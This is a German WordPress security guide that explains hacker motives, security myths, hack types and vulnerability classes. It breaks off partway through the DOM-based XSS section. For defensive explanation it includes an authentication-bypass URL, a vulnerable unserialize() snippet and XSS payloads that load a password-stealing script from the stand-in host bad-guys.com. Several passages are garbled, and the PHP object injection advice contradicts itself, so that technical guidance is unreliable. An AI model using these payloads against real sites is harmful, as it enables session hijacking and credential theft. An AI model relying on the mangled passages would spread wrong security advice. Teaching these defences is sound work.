WordPress-Sicherheit: Der ultimative Leitfaden

WordPress-Sicherheit kann einschüchternd sein, muss es aber nicht. In diesem umfassenden Leitfaden zur WordPress-Sicherheit haben wir die Grundlagen der Sicherung Ihrer WordPress-Website vereinfacht, sodass jeder nicht technisch versierte Benutzer seine Website verstehen und vor Hackerangriffen schützen kann.

Dieser Leitfaden zur WordPress-Sicherheit ist in 10 leicht verdauliche Abschnitte unterteilt. Jeder Abschnitt führt Sie durch einen bestimmten Aspekt der WordPress-Sicherheit. Am Ende des Leitfadens lernen Sie die verschiedenen Arten von Schwachstellen, die Motive von Hackern und wie Sie alles von Ihrem Server bis hin zu den einzelnen Benutzern Ihrer WordPress-Website absichern.

Tauchen wir ein!

Abschnitt 1: Ist WordPress sicher?

Ist WordPress sicher? Die kurze Antwort ist ja.

Hat WordPress Sicherheitsprobleme?

Während WordPress selbst sicher ist, erfordert die Vermeidung von WordPress-Sicherheitsfehlern ein wenig Aufwand von Seitenbesitzern. Die Wahrheit ist, dass das größte WordPress-Sicherheitsproblem seine Benutzer sind. Die meisten WordPress-Hacks auf der Plattform können mit ein wenig Aufwand von den Seitenbesitzern vermieden werden.

Keine Sorge, wir haben Sie abgedeckt. In diesem Leitfaden erfahren Sie alles, was Sie über die Sicherheit Ihrer Website wissen müssen.

Bevor wir unsere Websites sichern können, müssen wir zunächst fünf Dinge verstehen.

1. Warum Hacker Websites angreifen
2. Die verschiedenen Arten von WordPress-Hacks
3. Bestimmte Arten von WordPress-Schwachstellen
4. So verhindern Sie WordPress-Schwachstellen
5. So bestimmen Sie den Schweregrad einer Schwachstelle

Warum sollte ein Hacker meine Website angreifen?

Dies ist eine häufige WordPress-Sicherheitsfrage, die Sie sich stellen könnten, wenn Ihr schlimmster Albtraum wahr wird. Warum sollte ein Hacker meine Website angreifen? Seien Sie versichert, die Wahrscheinlichkeit, dass der Angriff persönlich ist, ist gering. Hacker haben Motive, die nichts mit dem Inhalt Ihrer Website zu tun haben. Hackern ist es normalerweise egal, ob Ihre Website eine Wohltätigkeitsseite für obdachlose Welpen oder eine Website mit Tonnen von coolem Merchandise zum Verkauf ist.

Es ist jedoch schwer, sich nicht angegriffen zu fühlen, wenn sich eine gesichtslose Identität in Ihre Website gehackt hat und Chaos und Aufruhr verursacht. Sie fühlen sich gestresst und die Situation gerät außer Kontrolle. Sie fühlen sich persönlich angegriffen und fragen sich, ob es eine Möglichkeit gibt, den Angriff zu verhindern. Sie könnten sich sogar fragen, ob das Wrack Ihrer Website gerettet werden kann.

Was ist es also, das einen Hacker dazu bringt, eine Website ins Visier zu nehmen? Es hat nichts mit Ihrer Website zu tun, welche Themen sie behandelt oder ähnliches. In Wirklichkeit zielen Hacker auf die Software ab, die Ihre Website verwendet, um am Laufen zu bleiben. Durch Hacken in diese Software können sie sensible Kundendaten stehlen oder sogar die Kontrolle über Ihre WordPress-Website übernehmen.

Leider ist WordPress mit seiner zunehmenden Popularität auch ein Ziel für Hacker geworden. Wenn ein beliebtes WordPress-Plugin eine ernsthafte Schwachstelle aufweist, hat ein Hacker möglicherweise die Blaupausen, um Hunderttausende, wenn nicht sogar Millionen von Websites zu übernehmen. Glücklicherweise werden die meisten Plugin-Schwachstellen schnell von ihren Entwicklern gepatcht.

Durch die Möglichkeit, an sensible und private Informationen zu gelangen, können Hacker diese dann für ein Einkommen verkaufen oder sogar das Daten-Lösegeld einbehalten, wodurch die Leute im Wesentlichen dafür bezahlen, dass ihre Informationen wieder in sicheren Händen sind.

Was ist also die Hauptmotivation von Hackern?

Cashflow für sich selbst zu schaffen.

Das Internet ist ein lukrativer Ort, der allen Gesellschaftsschichten die Möglichkeit bietet, einen existenzsichernden Lohn zu erwirtschaften. Das bedeutet jedoch nicht, dass jeder dies auf legale und moralische Weise angeht. Hacker machen selbst mit der kleinsten Website hohe Gewinne.

Geld ist die einzige Motivation, die sie brauchen, aber einige genießen das Gefühl der Macht, das sie bekommen, wenn sie erfolgreich eine Website knacken, aber die überwiegende Mehrheit ist nur des Geldes wegen im Geschäft.

Abschnitt 2: Die Top 5 der entlarvten WordPress-Sicherheitsmythen

Bevor wir in den Rest dieses WordPress-Sicherheitsleitfadens einsteigen, nehmen wir uns eine Minute Zeit, um einige WordPress-Sicherheitsmythen zu entlarven.

Im Internet kursieren viele WordPress-Sicherheitstipps von gut gemeinten Leuten, die wirklich helfen wollen. Leider basieren einige dieser Ratschläge auf WordPress-Sicherheitsmythen und fügen Ihrer WordPress-Website keine zusätzliche Sicherheit hinzu. Tatsächlich können einige WordPress-Sicherheits-„Tipps“ die Wahrscheinlichkeit erhöhen, dass Sie auf Probleme und Konflikte stoßen.

Wir haben viele WordPress-Sicherheitsmythen zur Auswahl, aber wir werden uns nur auf die Top 5 konzentrieren, die wir regelmäßig in über 30.000 Support-Tickets gesehen haben. Diese Gespräche mit unseren Kunden dienten als Grundlage für die folgenden Kriterien, um die Top-WordPress-Sicherheitsmythen auszuwählen:

1. Die Häufigkeit, mit der der Mythos erwähnt wurde.
2. Die Anzahl der Kopfschmerzen, die der Mythos verursacht hat.
3. Das falsche Sicherheitsgefühl, das der Mythos vermittelt.

1. Sie sollten Ihre /wp-admin- oder /wp-login-URL verbergen (auch bekannt als Hide Backend)

Die Idee hinter dem Verstecken des wp-admin ist, dass Hacker nicht hacken können, was sie nicht finden. Wenn Ihre Anmelde-URL nicht die standardmäßige WordPress-URL /wp-admin/ ist, sind Sie dann nicht vor Brute-Force-Angriffen geschützt?

Die Wahrheit ist, dass die meisten Hide Backend-Funktionen einfach Sicherheit durch Unklarheit bieten, was keine kugelsichere WordPress-Sicherheitsstrategie ist. Während das Verbergen Ihrer Back-End-wp-admin-URL dazu beitragen kann, einige der Angriffe auf Ihre Anmeldung abzuschwächen, wird dieser Ansatz nicht alle davon abhalten.

Wir erhalten häufig Support-Tickets von Leuten, die verwirrt darüber sind, wie iThemes Security Pro ungültige Anmeldeversuche meldet, wenn sie ihre Anmeldung ausgeblendet haben. Das liegt daran, dass es neben der Verwendung eines Browsers auch andere Möglichkeiten gibt, sich bei Ihren WordPress-Sites anzumelden, z. B. die Verwendung von XML-RPC oder der REST-API. Ganz zu schweigen davon, dass nach dem Ändern der Login-URL ein anderes Plugin oder Theme immer noch auf die neue URL verlinken könnte.

Tatsächlich ändert die Funktion zum Ausblenden des Backends nicht wirklich etwas. Ja, es hindert die meisten Benutzer daran, direkt auf die Standard-Anmelde-URL zuzugreifen. Aber nachdem jemand die benutzerdefinierte Anmelde-URL eingegeben hat, wird er zurück zur standardmäßigen WordPress-Anmelde-URL geleitet.

Es ist auch bekannt, dass das Anpassen der Anmelde-URL zu Konflikten führt. Es gibt einige Plugins, Themes oder Apps von Drittanbietern, die wp-login.php fest in ihre Codebasis codieren. Wenn also eine hartcodierte Software nach yoursite.com/wp-login.php sucht, findet sie stattdessen einen Fehler.

2. Du solltest deinen Theme-Namen und die WordPress-Versionsnummer verbergen

Wenn Sie die Entwicklertools Ihres Browsers verwenden, können Sie ziemlich schnell den Namen des Themes und die WordPress-Versionsnummer sehen, die auf einer WordPress-Site ausgeführt werden. Die Theorie hinter dem Verbergen Ihres Theme-Namens und Ihrer WP-Version ist, dass Angreifer, die diese Informationen haben, die Blaupause haben, um in Ihre Site einzudringen.

Wenn Sie sich zum Beispiel den obigen Screenshot ansehen, können Sie sehen, dass diese Site die Twenty Twenty-One verwendet und die WordPress-Version 5.6 ist.

Das Problem mit diesem WordPress-Sicherheitsmythos ist, dass hinter einer Tastatur kein echter Typ steht, der nach der perfekten Kombination aus Thema und WordPress-Versionsnummer sucht, um sie anzugreifen. Es gibt jedoch sinnlose Bots, die das Internet auf der Suche nach bekannten Schwachstellen im eigentlichen Code durchsuchen, der auf Ihrer Website ausgeführt wird.

3. Sie sollten Ihr wp-content-Verzeichnis umbenennen

Das Verzeichnis wp-content enthält Ihren Ordner für Plugins, Themes und Medien-Uploads. Das ist eine Menge guter Sachen und ausführbarer Codes in einem Verzeichnis, daher ist es verständlich, dass die Leute proaktiv sein und diesen Ordner schützen möchten.

Leider ist es ein WordPress-Sicherheitsmythos, dass das Ändern des wp-Inhaltsnamens der Site eine zusätzliche Sicherheitsebene hinzufügt. Es wird nicht. Wir können den Namen Ihres geänderten wp-content-Verzeichnisses mithilfe der Browser-Entwicklertools leicht finden. Im Screenshot unten sehen wir, dass ich das Inhaltsverzeichnis dieser Site in /test/ umbenannt habe.

Das Ändern des Namens des Verzeichnisses fügt Ihrer Site keine Sicherheit hinzu, kann jedoch Konflikte für Plugins verursachen, die einen fest codierten /wp-content/-Verzeichnispfad haben.

4. Meine Website ist nicht groß genug, um die Aufmerksamkeit von Hackern zu erregen

Dieser WordPress-Sicherheitsmythos macht viele Websites anfällig für Angriffe. Selbst wenn Sie der Besitzer einer kleinen Website mit geringem Traffic sind, ist es dennoch wichtig, dass Sie Ihre Website proaktiv schützen.

Selbst wenn Sie der Besitzer einer kleinen Website mit geringem Traffic sind, ist es dennoch wichtig, dass Sie Ihre Website proaktiv schützen.

Die Wahrheit ist, dass Ihre Website oder Ihr Unternehmen nicht groß sein muss, um die Aufmerksamkeit eines potentiellen Angreifers auf sich zu ziehen. Hacker sehen immer noch eine Möglichkeit, Ihre Site als Kanal zu nutzen, um einige Ihrer Besucher auf bösartige Sites umzuleiten, Spam von Ihrem Mail-Server zu versenden, Viren zu verbreiten oder sogar Bitcoin zu minen. Sie werden alles nehmen, was sie bekommen können.

5. WordPress ist eine unsichere Plattform

Der schädlichste WordPress-Sicherheitsmythos ist, dass WordPress selbst unsicher ist. Das stimmt einfach nicht. WordPress ist das beliebteste Content-Management-System der Welt, und es kam nicht dazu, dass Sicherheit nicht ernst genommen wurde.

Abschnitt 3: WordPress-Hacks und WordPress-Sicherheitslücken

4 Arten von WordPress-Hacks

Wenn es um das Verständnis der WordPress-Sicherheit geht, ist es wichtig zu verstehen

1. SEO-Spam

Eine weitere Motivation für einen Hacker, Ihre Website anzugreifen, besteht darin, die Vorteile von SEO-Spam zu nutzen. SEO oder Suchmaschinenoptimierung ist das, was Suchmaschinen verwenden, um Ihre Website zu indizieren oder zu bewerten. Durch die Verwendung bestimmter Keywords, die strategisch in Ihren Webseiten und Blog-Posts platziert werden, können Sie dazu beitragen, dass Ihre Website bei Google-Suchen einen höheren Rang erreicht. Dies erhöht den Traffic auf Ihre Website und kann Ihnen helfen, einen Gewinn zu erzielen, der Ihre Zeit wert ist.

Hacker wissen alles über SEO und nutzen es zu ihrem Vorteil. Wenn Ihre Website kompromittiert wurde, installieren Hacker eine Hintertür in Ihre Website. Auf diese Weise können sie Ihre Keywords und Website-Inhalte aus der Ferne steuern. Sie leiten den Verkehr von Ihrer Website oft um, leiten ihn direkt zu ihrer und übergehen Ihre vollständig.

Dies wird Ihre Zielgruppe verwirrt und frustriert zurücklassen und den Ruf und die Glaubwürdigkeit Ihrer Website zerstören. Ihre Website-Besucher werden oft auf offensichtlich betrügerische Websites umgeleitet und zögern, Ihre Website in Zukunft erneut zu besuchen.

Als ob das nicht schon schlimm genug wäre, sorgen Hacker, die diesen Ansatz verwenden, dafür, dass Ihre Website für Suchmaschinen schlecht aussieht, nicht nur für Mitmenschen. Ihre Website wird nicht mehr legitim aussehen und ihr Ranking wird schnell sinken. Ohne ein hohes Ranking bei der Suche wird Ihre Website zu einer der Millionen, die nie mehr als ein paar Treffer pro Monat erhalten.

2. Malware-Injektionen

Viele Hacker greifen Ihre Website an, um sie mit Malware zu infizieren. Malware sind winzige Code-Stücke, die verwendet werden können, um böswillige Änderungen an Ihrer Website vorzunehmen. Wenn Ihre Website mit Malware infiziert wird, ist es wichtig, so schnell wie möglich benachrichtigt zu werden.

Jede Minute, die Malware auf Ihrer Website verbleibt, fügt sie Ihrer Website mehr Schaden zu. Je mehr Schaden Ihrer Website zugefügt wird, desto länger dauert es, Ihre Website zu bereinigen und wiederherzustellen. Es ist wichtig, den Zustand Ihrer Website zu überprüfen, indem Sie regelmäßig nach Malware suchen. Aus diesem Grund ist es wichtig, den Zustand Ihrer Website kontinuierlich zu überprüfen, indem Sie nach Malware suchen.

3. Ransomware

Ein Hacker möchte möglicherweise Ihre Website angreifen, um sie für Lösegeld zu halten. Ransomware bezieht sich darauf, dass ein Hacker, der Ihre Website übernimmt, sie nicht an Sie zurückgibt, es sei denn, Sie zahlen ihnen eine hohe Gebühr. Die durchschnittliche Ausfallzeit eines Ransomware-Angriffs beträgt 9,5 Tage. Wie viel Umsatz würden Sie 10 Tage ohne Verkauf kosten?

Das durchschnittliche Lösegeld, das Hacker verlangen, ist dramatisch gestiegen, von 294 US-Dollar im Jahr 2015 auf weit über 13.000 US-Dollar im Jahr 2020. Mit dieser Art von Auszahlungen verlangsamt sich das Online-Kriminalitätsgeschäft nicht. Es wird immer wichtiger, Ihre Website ordnungsgemäß zu sichern und zu schützen, da kriminelle Gemeinschaften wie diese wachsen.

4. Verunstaltung der Website

Einige Hacker könnten Ihre Website aus Spaß angreifen. Ein weniger bösartiger Hacking-Stil ist der von Website-Defacern. Dies sind in der Regel Kinder oder junge Erwachsene, die gerade erst anfangen, mit ihren Hacking-Fähigkeiten herumzuspielen. Sie machen Hacks wie diese, um ihre Fähigkeiten zu üben und zu verbessern.

Wenn wir davon sprechen, dass eine Website verunstaltet wird, denken Sie an Graffiti. Die Angreifer werden das Erscheinungsbild Ihrer Website vollständig verändern, manchmal auf lustige oder verrückte Weise. Typische Website-Defacer tun ihre Taten zum Spaß oder um anzugeben. Sie posten oft Bilder ihrer Missetaten und versuchen, sich gegenseitig den Preis für die beste Verunstaltung zu gewinnen.

Die gute Nachricht ist, dass diese Form des Hackens für Sie weniger gefährlich ist. Da die Verunstaltungen hauptsächlich von Teenagern und anderen Amateur-Hackern durchgeführt werden, sind sie im Vergleich zu anderen Formen von Malware einfacher zu erkennen und von Ihrer Website zu entfernen. Sie können in der Regel von Scannern erkannt und schnell entfernt werden.

21 häufige WordPress-Sicherheitslücken erklärt

Leider existieren WordPress-Schwachstellen. WordPress-Schwachstellen können in Ihren Plugins, Ihren Themes und sogar in WordPress-Kern vorhanden sein. Und da WordPress mittlerweile fast 40% aller Websites betreibt, ist es noch wichtiger, Schwachstellen zu verstehen. Einfach gesagt: Sie müssen auf die Sicherheit Ihrer Website achten.

Wenn Sie kein WordPress-Sicherheitsexperte sind, kann es entmutigend sein, all die verschiedenen WordPress-Schwachstellen zu verstehen. Es kann auch überwältigend sein, zu versuchen, die verschiedenen Schweregrade einer Sicherheitsanfälligkeit zusammen mit den Risiken der WordPress-Sicherheitslücke zu verstehen.

In diesem Leitfaden werden die 21 häufigsten WordPress-Schwachstellen definiert, beschrieben, wie der Schweregrad einer WordPress-Schwachstelle bewertet wird, Beispiele dafür, wie ein Hacker die Schwachstelle ausnutzen kann, und zeigen, wie diese Schwachstellen verhindert werden können. Tauchen wir ein.

Was ist eine WordPress-Sicherheitslücke?

Eine WordPress-Sicherheitslücke ist eine Schwachstelle oder ein Fehler in einem Theme, Plugin oder WordPress-Kern, die von einem Hacker ausgenutzt werden kann. Mit anderen Worten, WordPress-Schwachstellen schaffen einen Einstiegspunkt, über den ein Hacker bösartige Aktivitäten ausführen kann.

Denken Sie daran, dass das Hacken von Websites fast vollständig automatisiert ist. Aus diesem Grund können Hacker in kürzester Zeit problemlos in eine große Anzahl von Websites einbrechen. Hacker verwenden spezielle Tools, die das Internet scannen und nach bekannten Schwachstellen suchen.

Hacker mögen einfache Ziele, und eine Website zu haben, auf der Software mit bekannten Schwachstellen ausgeführt wird, ist, als würde man einem Hacker Schritt für Schritt Anweisungen geben, um in Ihre WordPress-Website, Ihren Server, Ihren Computer oder jedes andere mit dem Internet verbundene Gerät einzudringen.

Unsere monatlichen WordPress-Sicherheitslückenberichte decken alle öffentlich offengelegten WordPress-Kern-, WordPress-Plugin- und Theme-Sicherheitslücken ab. In diesen Zusammenfassungen teilen wir den Namen des anfälligen Plugins oder Themes, die betroffenen Versionen und den Schwachstellentyp.

Was ist Zero-Day-Sicherheitslücke?

Wenn es um WordPress-Sicherheit geht, ist es wichtig, die Definition einer Zero-Day-Schwachstelle zu verstehen. Da die Sicherheitsanfälligkeit öffentlich bekannt wurde, hat der Entwickler null Tage Zeit, um die Sicherheitsanfälligkeit zu beheben. Und dies kann große Auswirkungen auf Ihre Plugins und Themes haben.

Normalerweise entdeckt ein Sicherheitsforscher eine Schwachstelle und legt die Schwachstelle privat den Entwicklern des Unternehmens offen, die die Software besitzen. Der Sicherheitsforscher und der Entwickler sind sich einig, dass die vollständigen Details veröffentlicht werden, sobald ein Patch verfügbar ist. Nach der Veröffentlichung des Patches kann es zu einer leichten Verzögerung bei der Offenlegung der Sicherheitsanfälligkeit kommen, damit mehr Personen Zeit für die Aktualisierung wichtiger Sicherheitslücken haben.

Wenn ein Entwickler jedoch nicht auf den Sicherheitsforscher reagiert oder keinen Patch für die Sicherheitsanfälligkeit bereitstellt, kann der Forscher die Sicherheitsanfälligkeit öffentlich offenlegen, um Druck auf den Entwickler auszuüben, einen Patch herauszugeben.

Die öffentliche Offenlegung einer Schwachstelle und die scheinbare Einführung eines Zero-Days können kontraproduktiv erscheinen. Dies ist jedoch der einzige Hebel, mit dem ein Forscher den Entwickler unter Druck setzen kann, die Schwachstelle zu schließen.

Googles Project Zero hat ähnliche Richtlinien, wenn es um die Offenlegung von Sicherheitslücken geht. Sie veröffentlichen die vollständigen Details der Schwachstelle nach 90 Tagen. Ob die Schwachstelle gepatcht wurde oder nicht.

Die Schwachstelle ist für jedermann zu finden. Wenn ein Hacker die Schwachstelle findet, bevor der Entwickler einen Patch veröffentlicht, wird dies zu einem schlimmsten Albtraum für Endbenutzer…. Ein aktiv ausgenutzter Zero-Day.

Was ist eine aktiv ausgenutzte Zero-Day-Sicherheitslücke?

Eine aktiv ausgenutzte Zero-Day-Sicherheitslücke ist genau das, wonach sie sich anhört. Es handelt sich um eine ungepatchte Schwachstelle, die Hacker angreifen, angreifen und aktiv ausnutzen.

Ende 2018 nutzten Hacker aktiv eine schwerwiegende WordPress-Sicherheitslücke im WP-DSGVO-Compliance-Plugin aus. Der Exploit ermöglichte es nicht autorisierten Benutzern – mehr dazu im nächsten Abschnitt –, die WP-Benutzerregistrierungseinstellungen zu ändern und die standardmäßige neue Benutzerrolle von einem Abonnenten zu einem Administrator zu ändern.

Diese Hacker haben diese Schwachstelle vor dem WP-DSGVO-Compliance-Plugin und Sicherheitsforschern gefunden. Jede Website, auf der das Plugin installiert war, war also eine einfache und garantierte Markierung für Cyberkriminelle.

So schützen Sie sich vor einer Zero-Day-Sicherheitslücke

Der beste Weg, Ihre Website vor einer Zero-Day-Schwachstelle zu schützen, besteht darin, die Software zu deaktivieren und zu entfernen, bis die Schwachstelle gepatcht ist. Glücklicherweise handelten die Entwickler des WP-DSGVO-Compliance-Plugins schnell und veröffentlichten am Tag nach der Veröffentlichung einen Patch für die Schwachstelle.

Ungepatchte Schwachstellen machen Ihre Website zu einem leichten Ziel für Hacker.

Nicht authentifizierte vs. authentifizierte WordPress-Sicherheitslücken

Es gibt zwei weitere Begriffe, mit denen Sie vertraut sein müssen, wenn Sie über WordPress-Schwachstellen sprechen.

1. Nicht authentifiziert – Eine nicht authentifizierte WordPress-Sicherheitslücke bedeutet, dass jeder die Sicherheitsanfälligkeit ausnutzen kann.
2. Authentifiziert – Eine authentifizierte WordPress-Sicherheitslücke bedeutet, dass ein angemeldeter Benutzer zum Ausnutzen erforderlich ist.

Eine Schwachstelle, die einen authentifizierten Benutzer erfordert, ist für einen Hacker viel schwieriger auszunutzen, insbesondere wenn sie Berechtigungen auf Administratorebene erfordert. Und wenn ein Hacker bereits einen Satz von Administratoranmeldeinformationen in der Hand hat, muss er wirklich keine Schwachstelle ausnutzen, um Schaden anzurichten.

Es gibt einen Vorbehalt. Einige authentifizierte Sicherheitslücken erfordern nur Fähigkeiten auf Abonnentenebene, um sie auszunutzen. Wenn Ihre Website es jedem erlaubt, sich zu registrieren, gibt es keinen großen Unterschied zu einer nicht authentifizierten Sicherheitslücke.

Wenn es um WordPress-Schwachstellen geht, gibt es 21 gängige Arten von Schwachstellen. Lassen Sie uns jeden dieser WordPress-Schwachstellentypen behandeln.

1. Authentifizierungs-Bypass

Eine Sicherheitsanfälligkeit durch Authentifizierungsbypass ermöglicht es einem Angreifer, Authentifizierungsanforderungen zu überspringen und Aufgaben auszuführen, die normalerweise authentifizierten Benutzern vorbehalten sind.

Authentifizierung ist der Prozess der Überprüfung der Identität eines Benutzers. WordPress verlangt von Benutzern, einen Benutzernamen und ein Passwort einzugeben, um ihre Identität zu überprüfen.

Authentifizierungs-Bypass-Beispiel

Anwendungen überprüfen die Authentifizierung basierend auf einem festen Satz von Parametern. Ein Angreifer könnte diese Parameter ändern, um Zugriff auf Webseiten zu erhalten, die normalerweise eine Authentifizierung erfordern.

Ein sehr einfaches Beispiel für so etwas ist ein Authentifizierungsparameter in der URL.

 https:/my-website/some-plugint?param=authenticated&param=no

Die obige URL hat einen Authentifizierungsparameter mit dem Wert no. Wenn wir diese Seite besuchen, erhalten wir eine Nachricht, die uns mitteilt, dass wir nicht berechtigt sind, die Informationen auf dieser Seite anzuzeigen.

Wenn die Authentifizierungsprüfung jedoch schlecht codiert war, könnte ein Angreifer den Authentifizierungsparameter ändern, um Zugriff auf die private Seite zu erhalten.

 https:/my-website/some-plugint?param=authenticated&param=yes

In diesem Beispiel könnte ein Hacker den Authentifizierungswert in der URL in yes ändern, um die Authentifizierungsanforderung zum Anzeigen der Seite zu umgehen.

So verhindern Sie die Verhinderung der Umgehung der Authentifizierung

Mithilfe der Zwei-Faktor-Authentifizierung können Sie Ihre Website vor Schwachstellen in der gebrochenen Authentifizierung schützen.

2. Sicherheitslücke in der Hintertür

Eine Backdoor- Schwachstelle ermöglicht es sowohl autorisierten als auch nicht autorisierten Benutzern, die normalen WordPress-Sicherheitsmaßnahmen zu umgehen und einen High-Level-Zugriff auf einen Computer, Server, eine Website oder eine Anwendung zu erhalten.

Backdoor-Beispiel

Ein Entwickler erstellt eine Hintertür, damit er als Administrator schnell zwischen Codierung und Testen des Codes wechseln kann. Leider vergisst der Entwickler, die Hintertür zu entfernen, bevor die Software für die Öffentlichkeit freigegeben wird.

Wenn ein Hacker die Hintertür findet, kann er den Einstiegspunkt ausnutzen, um Administratorzugriff auf die Software zu erhalten. Da der Hacker nun Administratorzugriff hat, kann er alle möglichen bösartigen Dinge tun, wie das Einschleusen von Malware oder das Stehlen sensibler Daten.

So verhindern Sie eine Hintertür

Viele Hintertüren können auf ein Problem reduziert werden, nämlich auf eine Fehlkonfiguration der Sicherheit. Probleme mit der WordPress-Sicherheitsfehlkonfiguration können gemildert werden, indem alle nicht verwendeten Funktionen aus dem Code entfernt, alle Bibliotheken auf dem neuesten Stand gehalten und Fehlermeldungen allgemeiner gemacht werden.

3. PHP-Objekt-Injection-Schwachstelle

Eine PHP Object-Injection- Schwachstelle tritt auf, wenn ein Benutzer eine Eingabe unserialized() , die nicht unserialized() . h. illegale Zeichen werden nicht entfernt) bevor sie an die PHP-Funktion unserialized() wird.

PHP-Objekt-Injection-Beispiel

Hier ist ein reales Beispiel für eine PHP Object-Injection-Schwachstelle im WordPress-Plugin Sample Ads Manager, die ursprünglich von sumofpwn gemeldet wurde.

Das Problem ist auf zwei unsichere Aufrufe von unserialize() in der sam-ajax-loader.php Datei des Plugins sam-ajax-loader.php . Die Eingabe erfolgt direkt aus der POST-Anfrage, wie im folgenden Code zu sehen ist.

 if ( in_array( $action, $allowed_actions ) ) { switch ( $action ) { case 'sam_ajax_load_place': echo json_encode( array( 'success' => false, 'error' => 'Deprecated...' ) ); break; case 'sam_ajax_load_ads': if ( ( isset( $_POST['ads'] ) && is_array( $_POST['ads'] ) ) && isset( $_POST['wc'] ) ) { $clauses = **unserialize( base64_decode( $_POST['wc'] ) )**;

Dieses Problem kann dazu führen, dass ein Angreifer bösartigen Code eingibt und ausführt.

So verhindern Sie die PHP-Objektinjektion

Verwenden unserialize() Funktion unserialize() mit vom Benutzer bereitgestellten Eingaben, sondern verwenden unserialize() stattdessen JSON-Funktionen.

4. Cross-Site-Scripting-Schwachstelle

Eine XSS- oder Cross-Site-Scripting-Sicherheitslücke tritt auf, wenn eine Webanwendung es Benutzern ermöglicht, benutzerdefinierten Code in den URL-Pfad einzufügen. Ein Angreifer kann die Sicherheitsanfälligkeit ausnutzen, um im Webbrowser des Opfers bösartigen Code auszuführen, eine Weiterleitung zu einer bösartigen Website zu erstellen oder eine Benutzersitzung zu kapern.

Es gibt drei Haupttypen von XSS, reflektiert. gespeichert und DOM-basiert

5. Reflektierte Cross-Site-Scripting-Sicherheitslücke

Eine reflektierter XSS oder Reflektierte Cross-Site Scripting tritt auf, wenn ein schädliches Skript in einer Client - Anfrage-Anforderung von Ihnen in einem Browser zu einem Server und zurück reflektiert wird durch den Server und ausgeführt von Ihrem Browser gemacht gesendet.

Reflektiertes Cross-Site-Scripting-Beispiel

Nehmen wir an, yourfavesite.com erfordert, dass Sie sich yourfavesite.com , um einige der Inhalte der Website anzuzeigen. Und nehmen wir an, diese Website kann Benutzereingaben nicht richtig codieren.

Ein Angreifer könnte diese Sicherheitsanfälligkeit ausnutzen, indem er einen schädlichen Link erstellt und diesen in E-Mails und Social-Media-Beiträgen mit Benutzern von yourfavesite.com teilt.

Der Angreifer verwendet ein Tool zur URL-Kürzung, um den bösartigen Link nicht bedrohlich und sehr anklickbar aussehen zu lassen, yourfavesite.com/cool-stuff . Wenn Sie jedoch auf den verkürzten Link klicken, wird der vollständige Link von Ihrem Browser ausgeführt yourfavesite.com/cool-stuff?q=cool-stuff<\script&src=”http://bad-guys.com/passwordstealingcode.js .

Nach dem Klicken auf den Link, werden Sie zu genommen yourfavesite.com und das schädliche Skript wird wieder in Ihrem Browser reflektiert werden, so dass der Angreifer Session - Cookies und kapern yourfavesite.com Konto.

So verhindern Sie Reflected Cross-Site Scripting

Regel Nr. 5 im OWASP-Spickzettel zur Verhinderung von Cross-Scripting ist die URL-Kodierung vor dem Einfügen nicht vertrauenswürdiger Daten in HTML-URL-Parameterwerte. Diese Regel kann dazu beitragen, das Erstellen einer reflektierten XSS-Sicherheitslücke zu verhindern, wenn nicht vertrauenswürdige Daten zum HTTP-GET-Parameterwert hinzugefügt werden.

<a href="http://www.yourfavesite.com?test=...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE...">link</a >

6. Gespeicherte Cross-Site-Scripting-Schwachstelle

Eine Stored XSS- oder Stored Cross-Site Scripting-Schwachstelle ermöglicht es Hackern, bösartigen Code in den Server einer Webanwendung einzuschleusen und auf diesem zu speichern .

Beispiel für gespeichertes Cross-Site-Scripting

Ein Angreifer entdeckt, dass yourfavesite.com Besuchern erlaubt, HTML-Tags in den Kommentarbereich der Site einzubetten. Also erstellt der Angreifer einen neuen Kommentar:

Großartiger Artikel! Sehen Sie sich diesen anderen großartigen <script src=”http://bad-guys.com/passwordstealingcode.js> . </script>

Hinweis: Bei einer reflektierten XSS- Sicherheitslücke müsste ein Besucher auf den Link des bösartigen Codes klicken, um ihn auszuführen. Ein gespeicherter XSS- Angriff erfordert lediglich den Besuch der Seite, die den Kommentar enthält. Der Schadcode wird bei jedem Seitenaufruf ausgeführt.

Jetzt, da unser Bösewicht den Kommentar hinzugefügt hat, wird jeder zukünftige Besucher dieser Seite seinem bösartigen Skript ausgesetzt. Das Skript wird auf der Website des Bösewichts gehostet und hat die Möglichkeit, Sitzungscookies von Besuchern und yourfavesite.com Konten zu entführen.

So verhindern Sie gespeichertes Cross-Site-Scripting

Regel Nr. 1 auf dem OWASP-Spickzettel zur Verhinderung von Cross-Scripting ist die HTML-Kodierung vor dem Hinzufügen nicht vertrauenswürdiger Daten zu HTML-Elementen.

 <body> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </body>

 <div> ...ENCODE UNTRUSTED DATA BEFORE PUTTING HERE... </div>

Codieren der folgenden Zeichen, um zu verhindern , dass in einen Ausführungskontext gewechselt wird, z. B. Skript, Stil oder Ereignishandler. Die Verwendung von Hex-Entitäten wird in der Spezifikation empfohlen.

 & --> &amp; < --> &lt; > --> &gt; " --> &quot; ' --> &#x27;

7. Dokumentobjektmodellbasierte Cross-Site-Scripting-Schwachstelle

Eine DOM-basierte XSS- oder Document Object Model-Based Cross-Site Scripting-Schwachstelle tritt auf, wenn das clientseitige Skript einer Website vom Benutzer bereitgestellte Daten in das Document Object Model (DOM) schreibt. Die Website liest dann das Benutzerdatum aus dem DOM und gibt es an den Webbrowser des Besuchers aus.

Wenn die vom Benutzer bereitgestellten Daten nicht ordnungsgemäß verarbeitet werden, könnte ein Angreifer schädlichen Code einschleusen, der ausgeführt wird, wenn die Website den Code aus dem DOM liest.

Hinweis: Reflected und Stored XSS sind serverseitige Probleme, während DOM-basiertes XSS ein Client-(Browser-)Problem ist.

Beispiel für dokumentobjektmodellbasiertes Cross-Site-Scripting

Eine gängige Art, einen DOM-XSS-Angriff zu erklären, ist eine benutzerdefinierte Willkommensseite. yourfavesite.com wir an, dass Sie nach dem Erstellen eines Kontos auf yourfavesite.com zu einer Begrüßungsseite weitergeleitet werden, die angepasst ist, um Sie mit dem folgenden Code mit yourfavesite.com Namen willkommen zu heißen. Und der Benutzername wird in die URL kodiert.

 <HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+8; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Welcome to yourfavesite.com! … </HTML>

Wir hätten also eine URL von yourfavesite.com/account?name=yourname .

Ein Angreifer könnte einen DOM-basierten XSS-Angriff ausführen, indem er die folgende URL an den neuen Benutzer sendet:

